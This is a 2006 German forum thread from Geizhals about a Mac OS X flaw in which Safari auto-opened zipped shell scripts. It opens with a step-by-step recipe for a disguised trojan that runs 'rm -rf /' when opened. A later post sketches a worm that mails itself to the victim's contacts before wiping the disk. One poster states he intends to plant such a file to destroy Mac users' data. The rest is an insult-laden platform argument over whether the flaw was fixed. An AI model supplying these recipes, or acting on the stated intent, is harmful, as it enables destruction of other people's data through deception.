Sichere Apples... Harhar...

Impressum | Werbung

Geizhals » Forum » Security & Viren »

Sichere Apples... Harhar... (23 Beiträge, 604 Mal gelesen)

Top-100 | Fresh-100

Du bist nicht angemeldet. [ Login/Registrieren ]

Wie tötet man einen Mac ?

1.) Shellscript bauen

rm -rf / 2>/dev/null

Wichtig: Ohne Shebang-Zeile (also ohne #!/bin/bash)
2.) Datei zippen
MacOSX hinterlegt dann im Zip, daß es ein Shellscript ist
3.) Datei auf Webserver stellen und als "Bill Gates sucks.zip" tarnen.
4.) Logfiles des Servers ansehen und sich deppat lachen.

Apples Safari öffnet "sichere Dateien" defaultmäßig automatisch und ohne Rückfrage, bei anderen (aktiven) fragt er mal - soweit sogut.

Aber wenn die Shebang-Zeile fehlt - erkennt die Testroutine nicht mehr, daß es ein aktiver Inhalt ist... und will ihn ausführen. Weil im Zip_Archiv der Resource Fork hinterlegt wurde ist MacOS aber klar, daß es eben ein Shell-Script ist...

Hehehehehehe. Clever gelöst, Apple.
Wenn sowas bei Windows klappen würde (daß Batchdateien in Zips automatisch ausgeführt werden) - wären schon 90% aller Rechner vom Netz...

http://www.heise.de/newsticker/meldung/69854

Pssssscht, Apple ist doch sooooo super.

lg
Gott

Hmmm...

Angenommen, man baut auf seinem Webserver einen ganz normalen Textblock a la

MacOSX is braindead...
This point is worth dwelling on given its incomprehensible magnitude. I cannot believe how incredibly stupid MacOSX is. I mean rock-hard stupid. Dehydrated-rock-hard stupid. World-class, A-1, top of the heap, triple whopper with cheese, supersized stupid. So stupid that it goes way beyond the stupid we know into a whole different dimension of stupid. One-of-a-kind, global, universal, intergalactic stupid. MacOS is trans-stupid stupid. Meta-stupid. Stupid collapsed on itself so far that even the neutrons have collapsed. Stupid so dense that no intellect can escape. Singularly, extraordinarily, incredibly, bewilderingly stupid....

[und so weiter]
und ergänzt dann um

And here is the proof how stupid MacOS is... Apple-Users, don't touch - you've been warned... proof.zip

Mach ich mich dann strafbar, wenn ein Appler drauf klickt und sich selbst vernichtet ??? IMHO nicht, denn ich habe ihn ja gewarnt... Hehe, werde ich machen

21.02.2006, 11:34 Uhr - Editiert von gepeinigter_aon_neukunde, alte Version: hier

Hehehehehehe. Clever gelöst, Apple.
Wenn sowas bei Windows klappen würde (daß Batchdateien in Zips automatisch
ausgeführt werden) - wären schon 90% aller Rechner vom Netz...

Was ja durchaus als positiv gesehen werden kann. Wir reden jetzt von 90 von 100 DAU Rechnern ... bei den anderen ist da sicher ein Riegel vorgeschoben, durch einen fähigen Admin ....

Dachte ich mir beim Schreiben auch

Wie auch immer, ohne Rückfrage automatisch zips öffnen ist ja noch ok... Aber automatisch ohne Rückfrage auch noch Shellscripts drinnen ausführen... Maaa, das könnte ja sogar per Mail klappen, wenn dann der Finder anrennt.

LOOOL... der Ultimative MacOSX-Wurm könnte wie folgt aussehen...

WURM=/tmp/wurm.$$.gz
gzip -9  -c "$0" > "$WURM"

for ziel in $( ermittle_mail-Kontakte )
do
	echo "BUBU" | mail -a $WURM  -s "Bill Gates sucks..." "$ziel"
done

rm -rf / 2>/dev/null

LOOOL... Ist ja echt sicher, so ein MacOS

Aso? In dem System bist genau wie bei Windows automatisch als root/admin eingelogt, der überhaupt mal Rechte für solche SuperGAU-Aktionen hat?

________________________________________________________________________
There's a typo in the Bible.
It should read "The geek shall inherit the earth".

Er schon...

..weil gleiche Bedingungen für OSX und XP, damit wir ja vergleichen können.....

I've felt the hate rise up in me,
Kneel down and clear the stone of leaves

I wander out where you can't see,
Inside my shell I wait and bleed

Sorry, dauert es bei einem Mac so lange, das System aufzusetzen ?

Das System neu aufsetzen müssen wäre mir wurscht - wenn alle meine Userdaten weg wären, wär' ich aber schon traurig - du net ?

Es reicht, um alle deine Userdaten zu vernichten.... Und welcher Appler hat schon ein Backup von allen - ich wette, keine 2%....

Jo eh. Weil kann ja eh nix passieren.

Zur Ehrenrettung der Apple-User: Wieviele Windows-User haben ein Backup, wohl wissend, daß sie jederzeit 'nen Schei.. aufführen können?

________________________________________________________________________
There's a typo in the Bible.
It should read "The geek shall inherit the earth".

Tendenziell mehr... Weil Windows-User niemals sagen würden "kann ja eh nix passieren."

Weil Windows-User niemals sagen würden "kann ja eh nix passieren."

Genau! Die haben nämlich schon die Erfahrung gemacht, dass ALLES passieren kann...

Eben....

Hab´ diesen Beitrag erst jetzt gesehen;

-) Tja,"leider" wird nicht das ganze System trotz -rf gelöscht; Systemfiles gehören hpts. root und dieser muß gesondert aktiviert werden.
-) Wenn das file keine extension hat,führt er gar nix aus,weil es als "Document" interpretiert wird.
-) Einige Tage nachdem sogar Heise draufgekommen ist, gefixed.
-) Safari hat vor den letzten Updates gewarnt,wenn in einem Archive (oder unkomprimiert) eine Anwendung enthalten war,also nicht nach dem Zufallsprinzip,wie Du es hier angiebst.
-) Die Option in Safari haben die meisten User,die ich kenne vor langer Zeit deaktiviert,weil sie eher lästig ist.
-) Es verwenden nicht einmal alle Mac User Safari,das Mozilla basierte Zeugs ist weitaus populärer als im Windowsschnitt.
-) Sieh Dir mal die Fileinfo an:
http://forum.geizhals.at/files/319/picture.png
---> Die meisten dieser Exploits setzen einen dämlichen User voraus,der alles und jedes herunterlädt.

Sicherheit ist ein Lernprozess,eben auch für Apple; allein die Doku der letzten Sicherheitsupdates ist schon stark verbessert worden,ich bin optimistisch,daß sie da denn Ball nicht fallen lassen werden.
Per Default bin ich auf meinem Apfel immer noch sehr viel sicherer als auf einem Windowsrechner.

Ich habe übrigens Backups von meinen files,von den wichtigen sogar tagesaktuelle

(Mit Disk Utility brauche ich ca. 10 Minuten ,um mein System neu einzuspielen.)

"wird nicht das ganze System trotz -rf "
Nein, aber alle Userdaten... Und nachdem einige Installer ihre Installationspfade world writable anlegen - wird einiges der SW nachher spinnen

"Wenn das file keine extension hat,führt er gar nix aus,weil es als "Document" interpretiert wird."
[ ] du hast das Problem verstanden.
Nein. Wenn es auf einem Rechner /ohne Extension/ dem Terminal zugeordnet wird, wird es im Terminal gestartet - das legt Apple im Resource Fork oder so ab. Der wird mit der Zipdatei mitgespeichert und geschickt - damit führt es das Zielsystem so aus

"-) Einige Tage nachdem sogar Heise draufgekommen ist, gefixed."
Gelogen. Wie auf Heise zu lesen ist, funktioniert der Heise-Demoexploit noch immer

"-) Die Option in Safari haben die meisten User,die ich kenne vor langer Zeit deaktiviert,weil sie eher lästig ist."
Was denn ? Ich dachte, Apple ist deshalb so toll, weil alles soooo super vorbereitet ist - einfach auspacken und spielen... Ach ja, das kann man ja nicht. Einfach auspacken und M$-Office verwenden

"-) Es verwenden nicht einmal alle Mac User Safari,das Mozilla"
Ich dachte, der Safari ist sooo super ? Ist aber eh wurscht, der Finder ist ja auch betroffen - und den verwenden ja alle

"-)ch habe übrigens Backups von meinen files,"
Hoffentlich immer vom System getrennt, sonst werden sie ja evtl. mitgelöscht... Außerdem - tagesaktuelle Backups ? Also kann ein Arbeitstag verloren sein - auch net fein. Abschließend: Wieviel % der Appler machen täglich Backups ? Mehr als eines ?

And you spread FUD,FUD,FUD,till your daddy takes the keyboard away........

Im Unterschied zu Dir habe ich es ausprobiert;auf einem aktuellen System.
Wenn ich ,sei es in vi, oder sonstwie ein Texfile ohne extension erstelle ist dem Terminal gar nix zugeordnet.Wie denn auch?
Ich muß es zB. erst executable machen.
No na wird es im Ressource Fork hinterlegt,sobald eine Zuordnung erfolgt ist.
Selbige läßt sich aber durch Änderung der Extension auch nicht so ohne weiters ändern.Wie in dem im Heise Artikel verlinkten Artikel zu sehen ist.

Wenn ich das Heise Demo downloade passiert folgendes:
http://forum.geizhals.at/files/319/picture.png
Und nach Bestätigigung rein gar nix!
Also,ja,definitiv behoben.

User, deren wirtschaftliche Existenz an ihren Daten hängen,machen natürlich Backups,keine Sorge; ganz sicher mehr als ein Prozent.

Sofern Du etwas gesunden Menschenverstand verwendest,kannst Du natürlich gleich loslegen und das ganz ohne MS bloatware. )%-
Nach wenigen Minuten hat ein nicht Analphabet auch erkannt,daß die Applikationseinstellungen im Prinzip immer unter AppName_Menu/Preferences zu finden sind,folglich ist das "Open Safe Files....blabla" Feature sehr leicht zu finden.

Wie auch in den meisten anderen Threads , die Du in letzter Zeit gestartet hast, kombinierst Du Polemik im Text mit irreführenden Überschriften ; hast Du früher für den Ubahnexpress gearbeitet?
Aus irgendwelchen Gründen, nimmst Du offenbar an, alle anderen Menschen sind Vollidioten, denen Du den "richtigen Pfad" zeigen müßtest(siehe den SelfHTML thread).

Wie sieht´s denn aus mit dem gigantischen Bedrohungsbild für OS X?
Es gab einige Proof-of-concepts,die teilweise nicht einmal auf einem 8 Monate alten System funktioniert haben(Bluetooth "Virus") und die keine Chance haben sich über das Netz selbstständig zu verbreiten.
AV-Hersteller wie Sophos oder Symantec ,deren Produkte für den Mac Müll sind,überschlagen sich mit Panikmeldungen,die "Fachpresse" greift das dankbar auf.
Selbstverständlich interessieren die Details kaum einen Journalisten,geifernde Sensationsberichterstattung ohne Recherche ist viel netter
Außerdem und zur Ehrenrettung der Presse erwähnt, interessieren Schädlingsmeldungen für Windows kaum mehr jemanden,weil sie so alltäglich wie der Wetterbericht geworden sind.

Ich behaupte nicht,daß es keine potenziellen Probleme gibt oder geben wird.
Die Hauptangriffsfläche ist letztlich das Spannungsfeld zwischen Unix Permissions und der Darstellung im Finder. Selbiger gehört ohnehin überarbeitet,da er fast so zuverlässig wie der Windows Explorer arbeitet.

Bisher haben sowohl Apple als auch die Community professionell und schnell auf alles reagiert. Nach entsprechendem Druck aus Entwicklerkreisen und von Regierungsanwendern ist die Doku zu den Updates auch sehr viel besser geworden. Der Updatemechanismus selbst ist unkompliziert ,unaufdringlich und sehr zuverlässig.

Ich kann weiterhin mit gutem Gewissen meine Freundin mit Adminrechten auf ihrem Mac werkeln lassen.

And you spread FUD,FUD,FUD,till your daddy takes the keyboard away........

LOOL - das aus deinem Munde ???

Im Unterschied zu Dir habe ich es ausprobiert;auf einem aktuellen System.
Wenn ich ,sei es in vi, oder sonstwie ein Texfile ohne extension erstelle ist dem Terminal gar nix zugeordnet.Wie denn auch?
Ich muß es zB. erst executable machen.

Na nonanet... Du mußt es executable machen.. Pfoah. Dann zippst es eben, versendest es... dann ist es für den nächsten schon Executable. Eeeecht ne Hacke!

No na wird es im Ressource Fork hinterlegt,sobald eine Zuordnung erfolgt ist.
Selbige läßt sich aber durch Änderung der Extension auch nicht so ohne weiters ändern.Wie in dem im Heise Artikel verlinkten Artikel zu sehen ist.

Bledsinn.
Datei anlegen und executable machen... Mit shebang - dann klappt's mal. später einfach shebang entfernen und fertig.

Wenn ich das Heise Demo downloade passiert folgendes:
http://forum.geizhals.at/files/319/picture.png
Und nach Bestätigigung rein gar nix!
Also,ja,definitiv behoben.
Nope... Wie wir auf der applefreundlichen Heise lesen:
http://www.heise.de/newsticker/result.xhtml?url=/newsticker/meldung/70259&words=Apple

In beiden Fällen bekommt der Anwender aber weiterhin ein JPG-Icon zu Gesicht, da zur Anzeige die Dateiendung ausgewertet wird. Sinnvoller wäre, zumindest auf die Diskrepanz von Endung und Inhalt hinzuweisen.

User, deren wirtschaftliche Existenz an ihren Daten hängen,machen natürlich Backups,keine Sorge; ganz sicher mehr als ein Prozent.

Wieso denn ? Ich dachte, die Apples sind sooo sicher ?!?. Ist aber eh ok, daß du das Gschichtl von Apple durchschaut hast - denn Apple bekommt ja net mal Rechner hin, die von Haus aus ein Raid drunterhaben... Also viel Wert dürften die User eh net auf ihre Daten lesen.

Sofern Du etwas gesunden Menschenverstand verwendest,kannst Du natürlich gleich loslegen und das ganz ohne MS bloatware. )%-

Bloatware??? Loool... So dämlich wie Apple ist sonst kein einziger EDV-Hersteller.. Gleichzeitig Fat-Binaries mit parallelem Intel- und Powercode drinnen und gleichzeitig Rechner auf den Markt werfen, die nur 40GB Plattenplatz haben.. Ich mein, ok, auf einem Apple rennt eh praktisch keine SW, da braucht man net viel Platz, aber trotzdem... pffrrrrrt.

Nach wenigen Minuten hat ein nicht Analphabet auch erkannt,daß die Applikationseinstellungen im Prinzip immer unter AppName_Menu/Preferences zu finden sind,

Nochmals LOOOL... Das ist die tolle intuitive Benutzerführung, für die die Appler gerne mehr zahlen ? Naja, nachdem die Appler es auch intuitiv gefunden haben, daß man eine Floppy auf den Mistkübel werfen muß um sie auszuwerfen... harrrharrr

Wie auch in den meisten anderen Threads , die Du in letzter Zeit gestartet hast, kombinierst Du Polemik im Text mit irreführenden Überschriften ; hast Du früher für den Ubahnexpress gearbeitet?

Jetzt greif doch bitte nicht einen Arbeitgeber an, der dich wegen zu krasser Gschichtln rausgeworfen haben könnte.

Aus irgendwelchen Gründen, nimmst Du offenbar an, alle anderen Menschen sind Vollidioten, denen Du den "richtigen Pfad" zeigen müßtest(siehe den SelfHTML thread).

Neee - das beschränkt sich auf Merkbefreite Poster hier, die ich so einschätze

Selbstverständlich interessieren die Details kaum einen Journalisten,geifernde Sensationsberichterstattung ohne Recherche ist viel netter
Außerdem und zur Ehrenrettung der Presse erwähnt, interessieren Schädlingsmeldungen für Windows kaum mehr jemanden,weil sie so alltäglich wie der Wetterbericht geworden sind.

Jajaja... Ich zitiere: "Intel inside, Idiot outside"... Das sind also die Detailverliebten Appler.. Wobei viele von denen ja ungefähr das technische OS-Design-Verständnis einer durchschnittlich begabten Küchenschabe haben (sonst hätten's nie MacOS9 gekauft - das technisch einem Win95 hinterherhinkte). Naja, seit den neuen Apples paßt deren Leitruf wenigstens.

Bisher haben sowohl Apple als auch die Community professionell und schnell auf alles reagiert. Nach entsprechendem Druck aus Entwicklerkreisen und von Regierungsanwendern ist die Doku zu den Updates auch sehr viel besser geworden. Der Updatemechanismus selbst ist unkompliziert ,unaufdringlich und sehr zuverlässig.

Ja genau... Lesen wir doch hier - man merke, alles Postings von Apple-Fans:
"Problem ungelöst:" http://www.heise.de/security/news/foren/go.shtml?read=1&msg_id=9968612&forum_id=93988
oder 'Nun ist es gefährlich, die Option "automatisch öffnen" zu deaktivieren'
http://www.heise.de/security/news/foren/go.shtml?read=1&msg_id=9971885&forum_id=93988
oder http://www.heise.de/newsticker/meldung/70458
Hack-Wettbewerb gegen OSX 10.4.5 - 30 Minuten dauerte es ? Pfoah. Echt ein sicheres System

Hey, ich hab nix gegen Macs... Nur sie als "intuitiv" (siehe deine tolle Empfehlung oben) oder als "sicher" zu verkaufen, ist ne fette Lüge... und gegen dicke, fette Lügen trete ich nun mal auf - egal wie merkbefreit mein Widerpart ist

Ich kann weiterhin mit gutem Gewissen meine Freundin mit Adminrechten auf ihrem Mac werkeln lassen.

Du bezeichnest Apple User als Ungeziefer, Idioten und mich als "merkbefreit",gleichzeitig schaffst Du es nicht einmal das verlinkte Heise UPDATE zu Ende zu lesen.
Als weiteren Bonus lieferst Du uns den "Hackerwettbewerb"; natürlich verschweigst Du uns,daß die lieben Leute im Rahmen dieses Wettbewerbs ein Account samt SSH Zugang zum Rechner hatten.

Ich bin Dir folglich dankbar für die Untermauerung meiner Hauptlinie im obigen Posting.
Das wirklich komische daran ist, ich bin zu 99% sicher zu wissen,wer Du bist,so gesehen überrascht mich Dein Stil nicht sehr.

Aber ich tue Dir einen kleine Gefallen: Ich antworte einfach nicht mehr,damit Du Dich nicht mit mir abquälen mußt und erkenne natürlich Deine geistige Überlegenheit damit an.

Du bezeichnest Apple User als Ungeziefer, Idioten und mich als "merkbefreit",

Bledsinn. Lies nochmal. Weder bezeichne ich jemand als Ungeziefer noch rede ich schlecht über alle Apple-User. Lies nochmal. Vielleicht kapierst du es beim 2., 3., ...mal

Beim Hackerwettbewerb verschweige ich übrigens gar nix - drum postete ich ja den Link. Net sehr schweigsam, oder ? Aber daß du nur Müll redest, ist ja nix neues. Definitiv dauerte es aber vom "eingeschränkten Benutzer" zum Admin 30 mins... Seeehr sicher.

Das wirklich komische daran ist, ich bin zu 99% sicher zu wissen,wer Du bist ...

LOOOL. Ein umgekehrtes "Mein Freund John"-Schema. Geh spielen.

... erkenne natürlich Deine geistige Überlegenheit damit an.

Du solltest aber nicht bei mir aufhören... u.U. könnte es ja sein, daß die durchschnittliche Stubenfliege in deiner möglicherweise Insektenverseuchten Unterkunft auch...

ich bin zu 99% sicher zu wissen,wer Du bist

Und weißt du auch, wo er wohnt?

In der Tat.....

Aber wenn interessiert`s......

Jajaja...

Wenn's so wäre, könntest deine Behauptung ja beweisen - indem du meinen Namen per PM schickst. Aber entweder du bist zu dumm dazu - oder du hast es nicht so mit beweisen und läßt es lieber mit unbeweisbaren und haltlosen Behauptungen...

Was von den 2 möglichen Varianten soll ich annehmen ???

Dieses Forum ist eine frei zugängliche Diskussionsplattform.
Der Betreiber übernimmt keine Verantwortung für den Inhalt der Beiträge und behält sich das Recht vor, Beiträge mit rechtswidrigem oder anstößigem Inhalt zu löschen.
Datenschutzerklärung